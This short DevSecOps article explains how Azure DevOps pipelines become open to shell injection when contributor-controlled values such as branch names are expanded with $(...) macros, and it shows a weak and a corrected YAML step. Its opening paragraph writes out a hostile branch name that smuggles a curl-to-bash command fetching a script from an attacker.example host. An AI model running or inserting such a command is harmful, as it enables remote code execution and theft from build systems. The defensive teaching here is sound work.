DevSecOps
Expression Security: Preventing Azure DevOps YAML Injection
A pull request arrives from a fork. The branch is named main; curl https://attacker.example/exfil.sh | bash; echo. Your pipeline uses $(Build.SourceBranchName) in a script step. Because $(...) macro syntax is substituted into the script text before the shell ever sees it, the script runs the branch name as shell. The exfiltration runs too.
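The step described above, with the weak form beside the corrected one, as an added example that is not part of the article. It assumes a pipeline that runs on pull requests, so Build.SourceBranchName is text a contributor controls; the branch name used in the comments, main; echo injected, is a constructed stand-in for any value containing shell metacharacters.

```yaml
# Added example (not from the article). Assumed context: an Azure Pipelines
# YAML file whose script steps see a contributor-controlled branch name.
# Constructed hostile branch name used in the comments: main; echo injected

pool:
  vmImage: ubuntu-latest

steps:
  # WEAK: $(...) macro syntax is replaced inside the script text before bash
  # runs it. With the constructed name the line becomes
  #   echo Building branch main; echo injected
  # and bash executes two commands. Double-quoting the macro would not fix
  # this either: a branch name can contain a closing quote or a $( sequence.
  - script: |
      echo Building branch $(Build.SourceBranchName)
    displayName: Weak - macro expanded into shell text

  # CORRECTED: map the variable into the step's environment. The value reaches
  # bash only as the contents of $BRANCH_NAME, never as script text, so the
  # metacharacters are printed literally. Quote the expansion so the shell
  # does no word splitting or globbing on it.
  - script: |
      echo "Building branch $BRANCH_NAME"
    displayName: Corrected - value passed through env
    env:
      BRANCH_NAME: $(Build.SourceBranchName)
```

The same pattern applies to every macro that carries contributor-supplied text (pull request titles, commit messages, source branches): pass it through env and quote it in the script, and treat any $(...) appearing directly inside a script body as a finding worth reviewing.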
Azure DevOps YAML expressions were designed to make …
